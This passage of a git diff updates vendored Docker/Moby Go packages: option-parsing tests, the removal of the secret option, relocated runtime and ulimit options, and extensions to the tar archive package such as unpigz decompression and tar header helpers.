-		assert.Equal(t, len(port.Value()), len(tc.expected))
-		for _, expectedPortConfig := range tc.expected {
-			assertContains(t, port.Value(), expectedPortConfig)
-		}
-	}
-}
-
-func TestPortOptValidComplexSyntax(t *testing.T) {
-	testCases := []struct {
-		value    string
-		expected []swarm.PortConfig
-	}{
-		{
-			value: "target=80",
-			expected: []swarm.PortConfig{
-				{
-					TargetPort:  80,
-					Protocol:    "tcp",
-					PublishMode: swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "target=80,protocol=tcp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:    "tcp",
-					TargetPort:  80,
-					PublishMode: swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "target=80,published=8080,protocol=tcp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    80,
-					PublishedPort: 8080,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "published=80,target=8080,protocol=tcp",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    8080,
-					PublishedPort: 80,
-					PublishMode:   swarm.PortConfigPublishModeIngress,
-				},
-			},
-		},
-		{
-			value: "target=80,published=8080,protocol=tcp,mode=host",
-			expected: []swarm.PortConfig{
-				{
-					Protocol:      "tcp",
-					TargetPort:    80,
-					PublishedPort: 8080,
-					PublishMode:   "host",
-				},
-			},
-		},
-		{
-			value: "target=80,published=8080,mode=host",
-			expected: []swarm.PortConfig{
-				{
-					TargetPort:    80,
-					PublishedPort: 8080,
-					PublishMode:   "host",
-					Protocol:      "tcp",
-				},
-			},
-		},
-		{
-			value: "target=80,published=8080,mode=ingress",
-			expected: []swarm.PortConfig{
-				{
-					TargetPort:    80,
-					PublishedPort: 8080,
-					PublishMode:   "ingress",
-					Protocol:      "tcp",
-				},
-			},
-		},
-	}
-	for _, tc := range testCases {
-		var port PortOpt
-		assert.NilError(t, port.Set(tc.value))
-		assert.Equal(t, len(port.Value()), len(tc.expected))
-		for _, expectedPortConfig := range tc.expected {
-			assertContains(t, port.Value(), expectedPortConfig)
-		}
-	}
-}
-
-func TestPortOptInvalidComplexSyntax(t *testing.T) {
-	testCases := []struct {
-		value         string
-		expectedError string
-	}{
-		{
-			value:         "invalid,target=80",
-			expectedError: "invalid field",
-		},
-		{
-			value:         "invalid=field",
-			expectedError: "invalid field",
-		},
-		{
-			value:         "protocol=invalid",
-			expectedError: "invalid protocol value",
-		},
-		{
-			value:         "target=invalid",
-			expectedError: "invalid syntax",
-		},
-		{
-			value:         "published=invalid",
-			expectedError: "invalid syntax",
-		},
-		{
-			value:         "mode=invalid",
-			expectedError: "invalid publish mode value",
-		},
-		{
-			value:         "published=8080,protocol=tcp,mode=ingress",
-			expectedError: "missing mandatory field",
-		},
-		{
-			value:         `target=80,protocol="tcp,mode=ingress"`,
-			expectedError: "non-quoted-field",
-		},
-		{
-			value:         `target=80,"protocol=tcp,mode=ingress"`,
-			expectedError: "invalid protocol value",
-		},
-	}
-	for _, tc := range testCases {
-		var port PortOpt
-		assert.Error(t, port.Set(tc.value), tc.expectedError)
-	}
-}
-
-func assertContains(t *testing.T, portConfigs []swarm.PortConfig, expected swarm.PortConfig) {
-	var contains = false
-	for _, portConfig := range portConfigs {
-		if portConfig == expected {
-			contains = true
-			break
-		}
-	}
-	if !contains {
-		t.Errorf("expected %v to contain %v, did not", portConfigs, expected)
-	}
-}
diff --git a/vendor/github.com/docker/docker/opts/quotedstring.go b/vendor/github.com/docker/docker/opts/quotedstring.go
index fb1e5374bc..6c889070e8 100644
--- a/vendor/github.com/docker/docker/opts/quotedstring.go
+++ b/vendor/github.com/docker/docker/opts/quotedstring.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 // QuotedString is a string that may have extra quotes around the value. The
 // quotes are stripped from the value.
@@ -18,7 +18,7 @@ func (s *QuotedString) Type() string {
 }
 
 func (s *QuotedString) String() string {
-	return string(*s.value)
+	return *s.value
 }
 
 func trimQuotes(value string) string {
diff --git a/vendor/github.com/docker/docker/opts/quotedstring_test.go b/vendor/github.com/docker/docker/opts/quotedstring_test.go
index 0ebf04bbe0..89fed6cfa6 100644
--- a/vendor/github.com/docker/docker/opts/quotedstring_test.go
+++ b/vendor/github.com/docker/docker/opts/quotedstring_test.go
@@ -1,28 +1,30 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
-	"github.com/docker/docker/pkg/testutil/assert"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestQuotedStringSetWithQuotes(t *testing.T) {
 	value := ""
 	qs := NewQuotedString(&value)
-	assert.NilError(t, qs.Set("\"something\""))
-	assert.Equal(t, qs.String(), "something")
-	assert.Equal(t, value, "something")
+	assert.Check(t, qs.Set(`"something"`))
+	assert.Check(t, is.Equal("something", qs.String()))
+	assert.Check(t, is.Equal("something", value))
 }
 
 func TestQuotedStringSetWithMismatchedQuotes(t *testing.T) {
 	value := ""
 	qs := NewQuotedString(&value)
-	assert.NilError(t, qs.Set("\"something'"))
-	assert.Equal(t, qs.String(), "\"something'")
+	assert.Check(t, qs.Set(`"something'`))
+	assert.Check(t, is.Equal(`"something'`, qs.String()))
 }
 
 func TestQuotedStringSetWithNoQuotes(t *testing.T) {
 	value := ""
 	qs := NewQuotedString(&value)
-	assert.NilError(t, qs.Set("something"))
-	assert.Equal(t, qs.String(), "something")
+	assert.Check(t, qs.Set("something"))
+	assert.Check(t, is.Equal("something", qs.String()))
 }
diff --git a/vendor/github.com/docker/docker/runconfig/opts/runtime.go b/vendor/github.com/docker/docker/opts/runtime.go
similarity index 97%
rename from vendor/github.com/docker/docker/runconfig/opts/runtime.go
rename to vendor/github.com/docker/docker/opts/runtime.go
index 4361b3ce09..4b9babf0a5 100644
--- a/vendor/github.com/docker/docker/runconfig/opts/runtime.go
+++ b/vendor/github.com/docker/docker/opts/runtime.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/opts/secret.go b/vendor/github.com/docker/docker/opts/secret.go
deleted file mode 100644
index 1fefcf8434..0000000000
--- a/vendor/github.com/docker/docker/opts/secret.go
+++ /dev/null
@@ -1,107 +0,0 @@
-package opts
-
-import (
-	"encoding/csv"
-	"fmt"
-	"os"
-	"path/filepath"
-	"strconv"
-	"strings"
-
-	"github.com/docker/docker/api/types"
-)
-
-// SecretOpt is a Value type for parsing secrets
-type SecretOpt struct {
-	values []*types.SecretRequestOption
-}
-
-// Set a new secret value
-func (o *SecretOpt) Set(value string) error {
-	csvReader := csv.NewReader(strings.NewReader(value))
-	fields, err := csvReader.Read()
-	if err != nil {
-		return err
-	}
-
-	options := &types.SecretRequestOption{
-		Source: "",
-		Target: "",
-		UID:    "0",
-		GID:    "0",
-		Mode:   0444,
-	}
-
-	// support a simple syntax of --secret foo
-	if len(fields) == 1 {
-		options.Source = fields[0]
-		options.Target = fields[0]
-		o.values = append(o.values, options)
-		return nil
-	}
-
-	for _, field := range fields {
-		parts := strings.SplitN(field, "=", 2)
-		key := strings.ToLower(parts[0])
-
-		if len(parts) != 2 {
-			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
-		}
-
-		value := parts[1]
-		switch key {
-		case "source", "src":
-			options.Source = value
-		case "target":
-			tDir, _ := filepath.Split(value)
-			if tDir != "" {
-				return fmt.Errorf("target must not be a path")
-			}
-			options.Target = value
-		case "uid":
-			options.UID = value
-		case "gid":
-			options.GID = value
-		case "mode":
-			m, err := strconv.ParseUint(value, 0, 32)
-			if err != nil {
-				return fmt.Errorf("invalid mode specified: %v", err)
-			}
-
-			options.Mode = os.FileMode(m)
-		default:
-			if len(fields) == 1 && value == "" {
-
-			} else {
-				return fmt.Errorf("invalid field in secret request: %s", key)
-			}
-		}
-	}
-
-	if options.Source == "" {
-		return fmt.Errorf("source is required")
-	}
-
-	o.values = append(o.values, options)
-	return nil
-}
-
-// Type returns the type of this option
-func (o *SecretOpt) Type() string {
-	return "secret"
-}
-
-// String returns a string repr of this option
-func (o *SecretOpt) String() string {
-	secrets := []string{}
-	for _, secret := range o.values {
-		repr := fmt.Sprintf("%s -> %s", secret.Source, secret.Target)
-		secrets = append(secrets, repr)
-	}
-	return strings.Join(secrets, ", ")
-}
-
-// Value returns the secret requests
-func (o *SecretOpt) Value() []*types.SecretRequestOption {
-	return o.values
-}
diff --git a/vendor/github.com/docker/docker/opts/secret_test.go b/vendor/github.com/docker/docker/opts/secret_test.go
deleted file mode 100644
index d978c86e22..0000000000
--- a/vendor/github.com/docker/docker/opts/secret_test.go
+++ /dev/null
@@ -1,79 +0,0 @@
-package opts
-
-import (
-	"os"
-	"testing"
-
-	"github.com/docker/docker/pkg/testutil/assert"
-)
-
-func TestSecretOptionsSimple(t *testing.T) {
-	var opt SecretOpt
-
-	testCase := "app-secret"
-	assert.NilError(t, opt.Set(testCase))
-
-	reqs := opt.Value()
-	assert.Equal(t, len(reqs), 1)
-	req := reqs[0]
-	assert.Equal(t, req.Source, "app-secret")
-	assert.Equal(t, req.Target, "app-secret")
-	assert.Equal(t, req.UID, "0")
-	assert.Equal(t, req.GID, "0")
-}
-
-func TestSecretOptionsSourceTarget(t *testing.T) {
-	var opt SecretOpt
-
-	testCase := "source=foo,target=testing"
-	assert.NilError(t, opt.Set(testCase))
-
-	reqs := opt.Value()
-	assert.Equal(t, len(reqs), 1)
-	req := reqs[0]
-	assert.Equal(t, req.Source, "foo")
-	assert.Equal(t, req.Target, "testing")
-}
-
-func TestSecretOptionsShorthand(t *testing.T) {
-	var opt SecretOpt
-
-	testCase := "src=foo,target=testing"
-	assert.NilError(t, opt.Set(testCase))
-
-	reqs := opt.Value()
-	assert.Equal(t, len(reqs), 1)
-	req := reqs[0]
-	assert.Equal(t, req.Source, "foo")
-}
-
-func TestSecretOptionsCustomUidGid(t *testing.T) {
-	var opt SecretOpt
-
-	testCase := "source=foo,target=testing,uid=1000,gid=1001"
-	assert.NilError(t, opt.Set(testCase))
-
-	reqs := opt.Value()
-	assert.Equal(t, len(reqs), 1)
-	req := reqs[0]
-	assert.Equal(t, req.Source, "foo")
-	assert.Equal(t, req.Target, "testing")
-	assert.Equal(t, req.UID, "1000")
-	assert.Equal(t, req.GID, "1001")
-}
-
-func TestSecretOptionsCustomMode(t *testing.T) {
-	var opt SecretOpt
-
-	testCase := "source=foo,target=testing,uid=1000,gid=1001,mode=0444"
-	assert.NilError(t, opt.Set(testCase))
-
-	reqs := opt.Value()
-	assert.Equal(t, len(reqs), 1)
-	req := reqs[0]
-	assert.Equal(t, req.Source, "foo")
-	assert.Equal(t, req.Target, "testing")
-	assert.Equal(t, req.UID, "1000")
-	assert.Equal(t, req.GID, "1001")
-	assert.Equal(t, req.Mode, os.FileMode(0444))
-}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go b/vendor/github.com/docker/docker/opts/ulimit.go
similarity index 65%
rename from vendor/github.com/docker/docker/runconfig/opts/ulimit.go
rename to vendor/github.com/docker/docker/opts/ulimit.go
index 5adfe30851..0e2a36236c 100644
--- a/vendor/github.com/docker/docker/runconfig/opts/ulimit.go
+++ b/vendor/github.com/docker/docker/opts/ulimit.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"fmt"
@@ -55,3 +55,27 @@ func (o *UlimitOpt) GetList() []*units.Ulimit {
 func (o *UlimitOpt) Type() string {
 	return "ulimit"
 }
+
+// NamedUlimitOpt defines a named map of Ulimits
+type NamedUlimitOpt struct {
+	name string
+	UlimitOpt
+}
+
+var _ NamedOption = &NamedUlimitOpt{}
+
+// NewNamedUlimitOpt creates a new NamedUlimitOpt
+func NewNamedUlimitOpt(name string, ref *map[string]*units.Ulimit) *NamedUlimitOpt {
+	if ref == nil {
+		ref = &map[string]*units.Ulimit{}
+	}
+	return &NamedUlimitOpt{
+		name:      name,
+		UlimitOpt: *NewUlimitOpt(ref),
+	}
+}
+
+// Name returns the option name
+func (o *NamedUlimitOpt) Name() string {
+	return o.name
+}
diff --git a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go b/vendor/github.com/docker/docker/opts/ulimit_test.go
similarity index 94%
rename from vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go
rename to vendor/github.com/docker/docker/opts/ulimit_test.go
index 0aa3facdfb..41e12627c8 100644
--- a/vendor/github.com/docker/docker/runconfig/opts/ulimit_test.go
+++ b/vendor/github.com/docker/docker/opts/ulimit_test.go
@@ -1,4 +1,4 @@
-package opts
+package opts // import "github.com/docker/docker/opts"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/README.md b/vendor/github.com/docker/docker/pkg/README.md
index c4b78a8ad8..755cd96836 100644
--- a/vendor/github.com/docker/docker/pkg/README.md
+++ b/vendor/github.com/docker/docker/pkg/README.md
@@ -1,8 +1,8 @@
-pkg/ is a collection of utility packages used by the Docker project without being specific to its internals.
+pkg/ is a collection of utility packages used by the Moby project without being specific to its internals.
 
-Utility packages are kept separate from the docker core codebase to keep it as small and concise as possible.
+Utility packages are kept separate from the moby core codebase to keep it as small and concise as possible.
 If some utilities grow larger and their APIs stabilize, they may be moved to their own repository under the
-Docker organization, to facilitate re-use by other projects. However that is not the priority.
+Moby organization, to facilitate re-use by other projects. However that is not the priority.
 
 The directory `pkg` is named after the same directory in the camlistore project. Since Brad is a core
 Go maintainer, we thought it made sense to copy his methods for organizing Go code :) Thanks Brad!
diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
index ffcc5647a9..9c12e8db8d 100644
--- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
+++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser.go
@@ -1,5 +1,5 @@
 // Package aaparser is a convenience package interacting with `apparmor_parser`.
-package aaparser
+package aaparser // import "github.com/docker/docker/pkg/aaparser"
 
 import (
 	"fmt"
@@ -22,14 +22,12 @@ func GetVersion() (int, error) {
 	return parseVersion(output)
 }
 
-// LoadProfile runs `apparmor_parser -r` on a specified apparmor profile to
-// replace the profile.
+// LoadProfile runs `apparmor_parser -Kr` on a specified apparmor profile to
+// replace the profile. The `-K` is necessary to make sure that apparmor_parser
+// doesn't try to write to a read-only filesystem.
 func LoadProfile(profilePath string) error {
-	_, err := cmd("", "-r", profilePath)
-	if err != nil {
-		return err
-	}
-	return nil
+	_, err := cmd("", "-Kr", profilePath)
+	return err
 }
 
 // cmd runs `apparmor_parser` with the passed arguments.
@@ -39,7 +37,7 @@ func cmd(dir string, arg ...string) (string, error) {
 
 	output, err := c.CombinedOutput()
 	if err != nil {
-		return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), string(output), err)
+		return "", fmt.Errorf("running `%s %s` failed with output: %s\nerror: %v", c.Path, strings.Join(c.Args, " "), output, err)
 	}
 
 	return string(output), nil
diff --git a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
index 69bc8d2fd8..6d1f737702 100644
--- a/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
+++ b/vendor/github.com/docker/docker/pkg/aaparser/aaparser_test.go
@@ -1,4 +1,4 @@
-package aaparser
+package aaparser // import "github.com/docker/docker/pkg/aaparser"
 
 import (
 	"testing"
diff --git a/vendor/github.com/docker/docker/pkg/archive/archive.go b/vendor/github.com/docker/docker/pkg/archive/archive.go
index 3261c4f498..daddebded4 100644
--- a/vendor/github.com/docker/docker/pkg/archive/archive.go
+++ b/vendor/github.com/docker/docker/pkg/archive/archive.go
@@ -1,4 +1,4 @@
-package archive
+package archive // import "github.com/docker/docker/pkg/archive"
 
 import (
 	"archive/tar"
@@ -6,7 +6,7 @@ import (
 	"bytes"
 	"compress/bzip2"
 	"compress/gzip"
-	"errors"
+	"context"
 	"fmt"
 	"io"
 	"io/ioutil"
@@ -14,27 +14,35 @@ import (
 	"os/exec"
 	"path/filepath"
 	"runtime"
+	"strconv"
 	"strings"
 	"syscall"
+	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/fileutils"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/ioutils"
 	"github.com/docker/docker/pkg/pools"
-	"github.com/docker/docker/pkg/promise"
 	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
 )
 
+var unpigzPath string
+
+func init() {
+	if path, err := exec.LookPath("unpigz"); err != nil {
+		logrus.Debug("unpigz binary not found in PATH, falling back to go gzip library")
+	} else {
+		logrus.Debugf("Using unpigz binary found at path %s", path)
+		unpigzPath = path
+	}
+}
+
 type (
 	// Compression is the state represents if compressed or not.
 	Compression int
 	// WhiteoutFormat is the format of whiteouts unpacked
 	WhiteoutFormat int
-	// TarChownOptions wraps the chown options UID and GID.
-	TarChownOptions struct {
-		UID, GID int
-	}
 
 	// TarOptions wraps the tar options.
 	TarOptions struct {
@@ -44,7 +52,7 @@ type (
 		NoLchown         bool
 		UIDMaps          []idtools.IDMap
 		GIDMaps          []idtools.IDMap
-		ChownOpts        *TarChownOptions
+		ChownOpts        *idtools.IDPair
 		IncludeSourceDir bool
 		// WhiteoutFormat is the expected on disk format for whiteout files.
 		// This format will be converted to the standard format on pack
@@ -58,33 +66,25 @@ type (
 		RebaseNames map[string]string
 		InUserNS    bool
 	}
-
-	// Archiver allows the reuse of most utility functions of this package
-	// with a pluggable Untar function. Also, to facilitate the passing of
-	// specific id mappings for untar, an archiver can be created with maps
-	// which will then be passed to Untar operations
-	Archiver struct {
-		Untar   func(io.Reader, string, *TarOptions) error
-		UIDMaps []idtools.IDMap
-		GIDMaps []idtools.IDMap
-	}
-
-	// breakoutError is used to differentiate errors related to breaking out
-	// When testing archive breakout in the unit tests, this error is expected
-	// in order for the test to pass.
-	breakoutError error
 )
 
-var (
-	// ErrNotImplemented is the error message of function not implemented.
-	ErrNotImplemented = errors.New("Function not implemented")
-	defaultArchiver   = &Archiver{Untar: Untar, UIDMaps: nil, GIDMaps: nil}
-)
+// Archiver implements the Archiver interface and allows the reuse of most utility functions of
+// this package with a pluggable Untar function. Also, to facilitate the passing of specific id
+// mappings for untar, an Archiver can be created with maps which will then be passed to Untar operations.
+type Archiver struct {
+	Untar         func(io.Reader, string, *TarOptions) error
+	IDMappingsVar *idtools.IDMappings
+}
 
-const (
-	// HeaderSize is the size in bytes of a tar header
-	HeaderSize = 512
-)
+// NewDefaultArchiver returns a new Archiver without any IDMappings
+func NewDefaultArchiver() *Archiver {
+	return &Archiver{Untar: Untar, IDMappingsVar: &idtools.IDMappings{}}
+}
+
+// breakoutError is used to differentiate errors related to breaking out
+// When testing archive breakout in the unit tests, this error is expected
+// in order for the test to pass.
+type breakoutError error
 
 const (
 	// Uncompressed represents the uncompressed.
@@ -105,17 +105,15 @@ const (
 	OverlayWhiteoutFormat
 )
 
-// IsArchive checks for the magic bytes of a tar or any supported compression
-// algorithm.
-func IsArchive(header []byte) bool {
-	compression := DetectCompression(header)
-	if compression != Uncompressed {
-		return true
-	}
-	r := tar.NewReader(bytes.NewBuffer(header))
-	_, err := r.Next()
-	return err == nil
-}
+const (
+	modeISDIR  = 040000  // Directory
+	modeISFIFO = 010000  // FIFO
+	modeISREG  = 0100000 // Regular file
+	modeISLNK  = 0120000 // Symbolic link
+	modeISBLK  = 060000  // Block special file
+	modeISCHR  = 020000  // Character special file
+	modeISSOCK = 0140000 // Socket
+)
 
 // IsArchivePath checks if the (possibly compressed) file at the given path
 // starts with a tar file header.
@@ -129,6 +127,7 @@ func IsArchivePath(path string) bool {
 	if err != nil {
 		return false
 	}
+	defer rdr.Close()
 	r := tar.NewReader(rdr)
 	_, err = r.Next()
 	return err == nil
@@ -145,17 +144,41 @@ func DetectCompression(source []byte) Compression {
 			logrus.Debug("Len too short")
 			continue
 		}
-		if bytes.Compare(m, source[:len(m)]) == 0 {
+		if bytes.Equal(m, source[:len(m)]) {
 			return compression
 		}
 	}
 	return Uncompressed
 }
 
-func xzDecompress(archive io.Reader) (io.ReadCloser, <-chan struct{}, error) {
+func xzDecompress(ctx context.Context, archive io.Reader) (io.ReadCloser, error) {
 	args := []string{"xz", "-d", "-c", "-q"}
 
-	return cmdStream(exec.Command(args[0], args[1:]...), archive)
+	return cmdStream(exec.CommandContext(ctx, args[0], args[1:]...), archive)
+}
+
+func gzDecompress(ctx context.Context, buf io.Reader) (io.ReadCloser, error) {
+	if unpigzPath == "" {
+		return gzip.NewReader(buf)
+	}
+
+	disablePigzEnv := os.Getenv("MOBY_DISABLE_PIGZ")
+	if disablePigzEnv != "" {
+		if disablePigz, err := strconv.ParseBool(disablePigzEnv); err != nil {
+			return nil, err
+		} else if disablePigz {
+			return gzip.NewReader(buf)
+		}
+	}
+
+	return cmdStream(exec.CommandContext(ctx, unpigzPath, "-d", "-c"), buf)
+}
+
+func wrapReadCloser(readBuf io.ReadCloser, cancel context.CancelFunc) io.ReadCloser {
+	return ioutils.NewReadCloserWrapper(readBuf, func() error {
+		cancel()
+		return readBuf.Close()
+	})
 }
 
 // DecompressStream decompresses the archive and returns a ReaderCloser with the decompressed archive.
@@ -179,32 +202,35 @@ func DecompressStream(archive io.Reader) (io.ReadCloser, error) {
 		readBufWrapper := p.NewReadCloserWrapper(buf, buf)
 		return readBufWrapper, nil
 	case Gzip:
-		gzReader, err := gzip.NewReader(buf)
+		ctx, cancel := context.WithCancel(context.Background())
+
+		gzReader, err := gzDecompress(ctx, buf)
 		if err != nil {
+			cancel()
 			return nil, err
 		}
 		readBufWrapper := p.NewReadCloserWrapper(buf, gzReader)
-		return readBufWrapper, nil
+		return wrapReadCloser(readBufWrapper, cancel), nil
 	case Bzip2:
 		bz2Reader := bzip2.NewReader(buf)
 		readBufWrapper := p.NewReadCloserWrapper(buf, bz2Reader)
 		return readBufWrapper, nil
 	case Xz:
-		xzReader, chdone, err := xzDecompress(buf)
+		ctx, cancel := context.WithCancel(context.Background())
+
+		xzReader, err := xzDecompress(ctx, buf)
 		if err != nil {
+			cancel()
 			return nil, err
 		}
 		readBufWrapper := p.NewReadCloserWrapper(buf, xzReader)
-		return ioutils.NewReadCloserWrapper(readBufWrapper, func() error {
-			<-chdone
-			return readBufWrapper.Close()
-		}), nil
+		return wrapReadCloser(readBufWrapper, cancel), nil
 	default:
 		return nil, fmt.Errorf("Unsupported compression format %s", (&compression).Extension())
 	}
 }
 
-// CompressStream compresseses the dest with specified compression algorithm.
+// CompressStream compresses the dest with specified compression algorithm.
 func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, error) {
 	p := pools.BufioWriter32KPool
 	buf := p.Get(dest)
@@ -225,6 +251,93 @@ func CompressStream(dest io.Writer, compression Compression) (io.WriteCloser, er
 	}
 }
 
+// TarModifierFunc is a function that can be passed to ReplaceFileTarWrapper to
+// modify the contents or header of an entry in the archive. If the file already
+// exists in the archive the TarModifierFunc will be called with the Header and
+// a reader which will return the files content. If the file does not exist both
+// header and content will be nil.
+type TarModifierFunc func(path string, header *tar.Header, content io.Reader) (*tar.Header, []byte, error)
+
+// ReplaceFileTarWrapper converts inputTarStream to a new tar stream. Files in the
+// tar stream are modified if they match any of the keys in mods.
+func ReplaceFileTarWrapper(inputTarStream io.ReadCloser, mods map[string]TarModifierFunc) io.ReadCloser {
+	pipeReader, pipeWriter := io.Pipe()
+
+	go func() {
+		tarReader := tar.NewReader(inputTarStream)
+		tarWriter := tar.NewWriter(pipeWriter)
+		defer inputTarStream.Close()
+		defer tarWriter.Close()
+
+		modify := func(name string, original *tar.Header, modifier TarModifierFunc, tarReader io.Reader) error {
+			header, data, err := modifier(name, original, tarReader)
+			switch {
+			case err != nil:
+				return err
+			case header == nil:
+				return nil
+			}
+
+			header.Name = name
+			header.Size = int64(len(data))
+			if err := tarWriter.WriteHeader(header); err != nil {
+				return err
+			}
+			if len(data) != 0 {
+				if _, err := tarWriter.Write(data); err != nil {
+					return err
+				}
+			}
+			return nil
+		}
+
+		var err error
+		var originalHeader *tar.Header
+		for {
+			originalHeader, err = tarReader.Next()
+			if err == io.EOF {
+				break
+			}
+			if err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+
+			modifier, ok := mods[originalHeader.Name]
+			if !ok {
+				// No modifiers for this file, copy the header and data
+				if err := tarWriter.WriteHeader(originalHeader); err != nil {
+					pipeWriter.CloseWithError(err)
+					return
+				}
+				if _, err := pools.Copy(tarWriter, tarReader); err != nil {
+					pipeWriter.CloseWithError(err)
+					return
+				}
+				continue
+			}
+			delete(mods, originalHeader.Name)
+
+			if err := modify(originalHeader.Name, originalHeader, modifier, tarReader); err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+		}
+
+		// Apply the modifiers that haven't matched any files in the archive
+		for name, modifier := range mods {
+			if err := modify(name, nil, modifier, nil); err != nil {
+				pipeWriter.CloseWithError(err)
+				return
+			}
+		}
+
+		pipeWriter.Close()
+
+	}()
+	return pipeReader
+}
+
 // Extension returns the extension of a file that uses the specified compression algorithm.
 func (compression *Compression) Extension() string {
 	switch *compression {
@@ -240,6 +353,67 @@ func (compression *Compression) Extension() string {
 	return ""
 }
 
+// FileInfoHeader creates a populated Header from fi.
+// Compared to archive pkg this function fills in more information.
+// Also, regardless of Go version, this function fills file type bits (e.g. hdr.Mode |= modeISDIR),
+// which have been deleted since Go 1.9 archive/tar.
+func FileInfoHeader(name string, fi os.FileInfo, link string) (*tar.Header, error) {
+	hdr, err := tar.FileInfoHeader(fi, link)
+	if err != nil {
+		return nil, err
+	}
+	hdr.Format = tar.FormatPAX
+	hdr.ModTime = hdr.ModTime.Truncate(time.Second)
+	hdr.AccessTime = time.Time{}
+	hdr.ChangeTime = time.Time{}
+	hdr.Mode = fillGo18FileTypeBits(int64(chmodTarEntry(os.FileMode(hdr.Mode))), fi)
+	name, err = canonicalTarName(name, fi.IsDir())
+	if err != nil {
+		return nil, fmt.Errorf("tar: cannot canonicalize path: %v", err)
+	}
+	hdr.Name = name
+	if err := setHeaderForSpecialDevice(hdr, name, fi.Sys()); err != nil {
+		return nil, err
+	}
+	return hdr, nil
+}
+
+// fillGo18FileTypeBits fills type bits which have been removed on Go 1.9 archive/tar
+// https://github.com/golang/go/commit/66b5a2f
+func fillGo18FileTypeBits(mode int64, fi os.FileInfo) int64 {
+	fm := fi.Mode()
+	switch {
+	case fm.IsRegular():
+		mode |= modeISREG
+	case fi.IsDir():
+		mode |= modeISDIR
+	case fm&os.ModeSymlink != 0:
+		mode |= modeISLNK
+	case fm&os.ModeDevice != 0:
+		if fm&os.ModeCharDevice != 0 {
+			mode |= modeISCHR
+		} else {
+			mode |= modeISBLK
+		}
+	case fm&os.ModeNamedPipe != 0:
+		mode |= modeISFIFO
+	case fm&os.ModeSocket != 0:
+		mode |= modeISSOCK
+	}
+	return mode
+}
+
+// ReadSecurityXattrToTarHeader reads security.capability xattr from filesystem
+// to a tar header
+func ReadSecurityXattrToTarHeader(path string, hdr *tar.Header) error {
+	capability, _ := system.Lgetxattr(path, "security.capability")
+	if capability != nil {
+		hdr.Xattrs = make(map[string]string)
+		hdr.Xattrs["security.capability"] = string(capability)
+	}
+	return nil
+}
+
 type tarWhiteoutConverter interface {
 	ConvertWrite(*tar.Header, string, os.FileInfo) (*tar.Header, error)
 	ConvertRead(*tar.Header, string) (bool, error)
@@ -250,9 +424,9 @@ type tarAppender struct {
 	Buffer    *bufio.Writer
 
 	// for hardlink mapping
-	SeenFiles map[uint64]string
-	UIDMaps   []idtools.IDMap
-	GIDMaps   []idtools.IDMap
+	SeenFiles  map[uint64]string
+	IDMappings *idtools.IDMappings
+	ChownOpts  *idtools.IDPair
 
 	// For packing and unpacking whiteout files in the
 	// non standard format. The whiteout files defined
@@ -261,6 +435,16 @@ type tarAppender struct {
 	WhiteoutConverter tarWhiteoutConverter
 }
 
+func newTarAppender(idMapping *idtools.IDMappings, writer io.Writer, chownOpts *idtools.IDPair) *tarAppender {
+	return &tarAppender{
+		SeenFiles:  make(map[uint64]string),
+		TarWriter:  tar.NewWriter(writer),
+		Buffer:     pools.BufioWriter32KPool.Get(nil),
+		IDMappings: idMapping,
+		ChownOpts:  chownOpts,
+	}
+}
+
 // canonicalTarName provides a platform-independent and consistent posix-style
 //path for files and directories to be archived regardless of the platform.
 func canonicalTarName(name string, isDir bool) (string, error) {
@@ -283,33 +467,30 @@ func (ta *tarAppender) addTarFile(path, name string) error {
 		return err
 	}
 
-	link := ""
+	var link string
 	if fi.Mode()&os.ModeSymlink != 0 {
-		if link, err = os.Readlink(path); err != nil {
+		var err error
+		link, err = os.Readlink(path)
+		if err != nil {
 			return err
 		}
 	}
 
-	hdr, err := tar.FileInfoHeader(fi, link)
+	hdr, err := FileInfoHeader(name, fi, link)
 	if err != nil {
 		return err
 	}
-	hdr.Mode = int64(chmodTarEntry(os.FileMode(hdr.Mode)))
-
-	name, err = canonicalTarName(name, fi.IsDir())
-	if err != nil {
-		return fmt.Errorf("tar: cannot canonicalize path: %v", err)
-	}
-	hdr.Name = name
-
-	inode, err := setHeaderForSpecialDevice(hdr, ta, name, fi.Sys())
-	if err != nil {
+	if err := ReadSecurityXattrToTarHeader(path, hdr); err != nil {
 		return err
 	}
 
 	// if it's not a directory and has more than 1 link,
 	// it's hard linked, so set the type flag accordingly
 	if !fi.IsDir() && hasHardlinks(fi) {
+		inode, err := getInodeFromStat(fi.Sys())
+		if err != nil {
+			return err
+		}
 		// a link should have a name that it links too
